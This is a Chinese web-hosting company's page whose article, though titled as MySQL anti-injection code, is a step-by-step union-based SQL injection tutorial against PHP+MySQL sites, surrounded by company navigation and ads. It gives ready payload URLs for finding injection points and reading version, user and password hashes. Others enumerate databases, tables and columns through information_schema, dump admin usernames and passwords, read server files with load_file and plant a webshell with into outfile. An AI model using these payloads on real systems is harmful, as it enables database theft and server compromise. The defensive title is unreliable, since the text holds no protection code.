点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息 点击这里给我发消息  
 
 
  网站建设   广州威客   网上商机   网上商城   海讯黄页   网址天地   专区展示   社 区  
 
 
 
首 页  网站建设套餐  我要建站  案例欣赏  网站模板  服务区域  域名查询注册  企业邮局  主机空间  策划推广  海讯优势  客服中心  代理专区
各地分公司: 北京站 | 上海站 | 广州站 | 南宁站 | 郑州站 | 南京站 | 武汉站
   您现在的位置是:海讯集团>>案例欣赏>>类别>>详细内容
建站套餐[全部]
门户型¥5588-88880
购物型¥4688-38000
高级豪华型¥5688-18880
标准型宣传(¥6688)
普及型宣传(¥5888)
基础型宣传(¥4688)
经济型宣传(¥3388)
网站模板
 



mysql防注入代码,防止别人写入代码


http://www.okit88.com    发布日期:2011-7-28 11:08:15    浏览次数:13625     < 返回 >

mysql防注入代码,防止别人写入代码

mysql5注入2010-05-30 16:45假设url:http://www.abc.com/fuck.php?id=1
这里只讨论php+mysql5的搭配,并且在mysql5中的information_schema系统表可以正常使用的情况下...

1.判断是否是注入点:and 1=1/*   and 1=2/*
2.判断字段长度
假如http://www.abc.com/fuck.php?id=1 order by n/*时出错,字段长度就是n-1
当然可以采用递增的方法http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5.....n-1/*
3.判断版本,数据库名,数据库连接用户名,mysql系统用户,用户密码
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5....n-1/*这里出现的索引值,我们只能用字符型的索引值,假设索引值是2、3、4,而且都是字符型的
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(version())),unhex(hex(user())),unhex(hex(database
())),5.....n-1/*
有些时候我们不对函数进行编码的话,可以会读取不出来,所以我们直接利用unhex(hex())绕过直接读取,如果这个要读不出来,我也没办法了
假设这里得到mysql连接用户是abc,我们先对abc进行16进制编码为0x616263,然后可以通过http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(password(0x616263))),3,4,5.....n-1/*获得abc用户的密码hash
mysql的密码官方标准的加密方式是40位sha1加密,但是也有部分采用的是md5或者其他的加密方式
4.判断是否存在information_schema系统表(我没有想到更好的办法)
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,2,3,4,5....n-1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata/*
如果有返回值的话就说明information_schema系统是存在的
5.判断数据库服务器中有多少个数据库(系统库有information_schema、test、mysql三个)
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 0,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 1,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 2,1/*
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,schema_name,3,4,5....n-1 from information_schema.schemata limit 3,1/*
limit进行递增,一旦出错的话就说明没有了
6.假设有个库名是fuck,我们来查fuck库中的表
首先对fuck进行16进制编码为0x6675636B
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,table_name,3,4,5....n-1 from information_schema.tables where
table_schema=0x6675636B limit 0,1/*
同上面一样进行limit参数递增,得到fuck库中所有的表,假设有个表是admin
7.我们来读取fuck库中admin表中的字段
同样我们要对admin进行16进制编码为0x61646D696E,提交
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,column_name,3,4,5....n-1 from information_schema.columns where table_name=0x61646D696E limit 0,1/*
同样limit进行递增,假设字段是username和password
8.获得fuck库admin表username和password字段的内容
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,username,password,4,5....n-1 from admin
如果读取的数据库名和user()函数读取的一样的话,假设上面的fuck库不是web当前使用的数据库,最后读取字段内容的时候admin表要写成fuck.admin的形式
还有就是load_file()和into outfile()函数的使用
先说load_file()
路径有使用者自己来输入,假设是c:\boot.ini,先对c:\boot.ini进行16进制编码为0x633A5C626F6F742E696E69,然后提交
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,unhex(hex(load_file(0x633A5C626F6F742E696E69))),3,4,5....n-1/*
这个load_file()进行unhex(hex())绕一下效果更好
into outfile()函数,在php脚本中威力表现不出来,因为php版本默认设置的原因,如果是其他脚本和mysql搭配的话,into outfile()就能发挥威

力了
http://www.abc.com/fuck.php?id=1 and 1=2 union select 1,'一句话木马',3,4,5....n-1 into oufile('xxxxx')/*
路径可以16进制编码下

 
案例推荐
广州康童玩具有限公司
广州康童玩具有限公司...
关健词:康童玩具专业开...
百度排名:第一页
[类别-]  [详情]
广州高俪舞台灯光设备厂
广州高俪舞台灯光设备...
关健词:广州高俪舞台灯...
百度排名:第一页
[类别-]  [详情]
广州鑫茵花艺
广州鑫茵花艺...
关健词:飞腾国际花艺...
百度排名:第一页
[类别-]  [详情]
最新行业报道
· 页面注册指向和返回  - [2013-9-30]
· 记录网页浏览次数,记录浏次数  - [2013-9-30]
· 月份的英文缩写,月份的英文写...  - [2013-9-30]
· 网站制作-输入框只能输入数字  - [2013-9-30]
· QQ客服在页面固定位置的代码  - [2013-9-28]
· flash全屏代码,flas...  - [2013-9-28]
网站建设技术专题
· QQ在线咨询显示未启用,QQ...  - [2013-5-21]
· 点击下载按钮 自动...  - [2013-4-27]
· [88229999]com....  - [2013-1-15]
· 如何查看服务器PID,W3W...  - [2011-12-25]
· 来源W3SVC 事...  - [2011-12-23]
· sql数据库连接语句,sql...  - [2011-12-22]
案例类别
木业、木材加工
会展、设计、策划类
动漫、游戏机、福彩
外语、翻译、律师事务
生物养生、风水易经
家政劳务、搬家、移民
购物类,综合类
政府、行业、门户型
服装、鞋帽、布料
皮具、皮包、文件夹
旅游、机票、酒店
二手车交易、旅游租车
母婴、日用、化妆品
美容、美体、美发
医药、保健、医疗器械
婚庆、礼仪庆典
投资、顾问、咨询
电子、五金、机械
环保、化工、涂料
教育培训、文化、娱乐
房地产、房屋租赁
IT科技、软件、通信
金融、股票保险、财经
建筑、建材、装饰
食品、饮料(酒)、茶叶
家居、家电、电器
工艺品、礼品、鲜花
办公、文教、乐器
广告、包装、雕刻印刷
汽车、物流、汽配
物业、票务、船务
仪器、仪表、保险柜
摄影、冲印、玩具
拍卖、投资、典当
珠宝、首饰品
钟表、眼镜
照明、水电、能源
演艺、体育、文体用品
贸易、出口、报关
宠物、宠物食品
交友网站
音响,影院,器械设备
网站建设技术专题
· QQ在线咨询显示未启用,QQ在线... - [2013-5-21]
· 点击下载按钮 自动更新... - [2013-4-27]
· [88229999]com.te... - [2013-1-15]
· 如何查看服务器PID,W3WP.... - [2011-12-25]
· 来源W3SVC 事件I... - [2011-12-23]
· sql数据库连接语句,sql数据... - [2011-12-22]
· W3wp.exe 进程... - [2011-12-22]
· 服务器CPU占用过高,w3wp.... - [2011-12-22]
· asp图片加水印,asp图片上传... - [2011-7-28]
海讯专题报道
· 怎么制作网页 - [2010-11-27]
· 网页设计职业和前景怎么样呀,网页... - [2010-11-19]
· 要作网页怎么做才好 - [2010-11-19]
· 日子一天天过去 - [2010-11-16]
· 在PHOTOSHOP里边如何用笔... - [2010-11-16]
· 如何创建一个冲击波场景,用PHO... - [2010-11-16]
· 对于文字排版的学习,中国汉字在编... - [2010-11-15]
· 工程师,怎样才能设计一个好的lo... - [2010-11-15]
· 一个商业平面设计师的几点心得 - [2007-3-6]
最新行业报道
· 页面注册指向和返回 - [2013-9-30]
· 记录网页浏览次数,记录浏次数 - [2013-9-30]
· 月份的英文缩写,月份的英文写法 - [2013-9-30]
· 网站制作-输入框只能输入数字 - [2013-9-30]
· QQ客服在页面固定位置的代码 - [2013-9-28]
· flash全屏代码,flash全... - [2013-9-28]
· 域名更改解析后 打不开网站。电脑... - [2013-5-29]
· 360浏览器拦截网站,百度拦截网... - [2013-5-29]
· js中的Mid()函数对应的JS... - [2013-5-21]
域名|邮箱|主机产品
企业邮箱 VPS主机 特惠主机 美国主机 香港主机 欧洲主机 短信网址 中文域名 国际域名
企业邮箱 VPS主机 特惠主机 美国主机 香港主机 欧洲主机 短信网址 中文域名 国际域名
  关于海讯 | 加盟合作 | 服务指南 | 诚聘英才 | 服务项目 | 监督热线 | BBS论坛
版权所有:广州IT服务中心  广州海讯电子科技有限公司 ◎ 2006-2010    服务手机:15918582336
服务电话:020-82161215 020-85832530    地址:广州天河车陂路天隆花园B1栋。(车陂文化广场傍),
地铁车陂南站C出口,大概100米,(车陂公交场正对面,278,B15,B12,548,568路等) 易先生 刘小姐 周先生 宋小姐
常年法律顾问:黄律师 执证号:190001112580    您是第 54652960 位来访者   服务邮箱:okit168@okit88.cn 
网站地址:http://www.okit88.com 国信备案号:粤ICP备07032675号
客服一:710884198  客服二:475145816  客服三: 253549058  客服四:33207742 技术一:358545054  技术二:356525438
在线MSN: okit88@126.com  在线MSN:okit888@126.com    在线MSN:okit8888@126.com
专业提供域名注册、空间租用、FLASH制作、网站建设、网站制作、网管出租、IT外包、网站推广策划